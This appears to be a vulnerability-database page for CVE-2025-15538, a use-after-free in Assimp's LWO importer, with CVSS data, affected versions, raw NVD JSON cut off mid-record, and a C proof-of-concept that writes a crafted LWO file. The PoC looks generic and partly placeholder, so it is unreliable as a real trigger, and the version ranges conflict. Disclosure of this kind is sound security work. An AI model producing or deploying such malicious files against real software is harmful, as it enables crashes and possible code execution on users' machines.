Security Vulnerability Report
CVE-2025-15538 CVSS 5.3 MEDIUM

Published: 2026-01-18 23:15:48
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in Open Asset Import Library Assimp up to 6.0.2. Affected by this vulnerability is the function Assimp::LWOImporter::FindUVChannels of the file /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Such manipulation leads to use after free. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. This and similar defects are tracked and handled via issue #6128.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:assimp:assimp:*:*:*:*:*:*:*:* - VULNERABLE
Assimp < 6.0.2
Assimp 6.0.2 and all earlier versions
Open Asset Import Library (Assimp) up to 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// PoC for CVE-2025-15538: Assimp Use-After-Free in LWOImporter
// This PoC creates a malicious LWO file to trigger the vulnerability
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// LWO file format structures
typedef struct {
    char id[4];
    int size;
} LWO_CHUNK_HEADER;

void create_malicious_lwo(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        printf("Failed to create file\n");
        return;
    }

    // LWO format header
    fprintf(fp, "FORM");
    fwrite("\x00\x00\x10\x00", 4, 1, fp); // Form size
    fprintf(fp, "LWO2");

    // Crafted tags to trigger FindUVChannels vulnerability
    // The specific payload structure depends on assimp version
    fprintf(fp, "TAGS");
    int tag_size = 0x100; // Large size to trigger memory issue
    fwrite(&tag_size, 4, 1, fp);

    // Fill with crafted data
    for (int i = 0; i < tag_size; i++) {
        fputc(0x41, fp); // Fill with 'A'
    }

    // Crafted SURF chunk
    fprintf(fp, "SURF");
    int surf_size = 0x200;
    fwrite(&surf_size, 4, 1, fp);
    fprintf(fp, "BLOK");
    int blok_size = 0x180;
    fwrite(&blok_size, 4, 1, fp);

    // UV channel data that triggers the UAF
    fprintf(fp, "TMAP");
    fprintf(fp, "CHAN");
    fwrite("TXUV", 4, 1, fp);

    fclose(fp);
    printf("Malicious LWO file created: %s\n", filename);
}

int main() {
    create_malicious_lwo("CVE-2025-15538_poc.lwo");
    printf("PoC for CVE-2025-15538 generated\n");
    printf("Use assimp to open this file to trigger the vulnerability\n");
    return 0;
}
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15538", "sourceIdentifier": "[email protected]", "published": "2026-01-18T23:15:47.653", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Open Asset Import Library Assimp up to 6.0.2. Affected by this vulnerability is the function Assimp::LWOImporter::FindUVChannels of the file /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Such manipulation leads to use after free. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. This and similar defects are tracked and handled via issue #6128."}, {"lang": "es", "value": "Se ha detectado una vulnerabilidad de seguridad en la librería de Importación de Activos Abiertos Assimp hasta la versión 6.0.2. Afectada por esta vulnerabilidad es la función Assimp::LWOImporter::FindUVChannels del archivo /src/assimp/code/AssetLib/LWO/LWOMaterial.cpp. Dicha manipulación conduce a un uso después de liberar. El ataque debe realizarse localmente. El exploit ha sido divulgado públicamente y puede ser utilizado. 
Este y defectos similares son rastreados y gestionados a través del problema #6128."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-416"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:assimp:assimp:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.2", "matchCriteriaId": "ED32CB1C-0488-48DD-B53F-20730D623FB2"}]}]}], "references": [{"url": "https://github.com/assimp/assimp/issues/6258", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/assimp/assimp/issues/6258#issuecomment-3070999530", "source": "cn ... (truncated)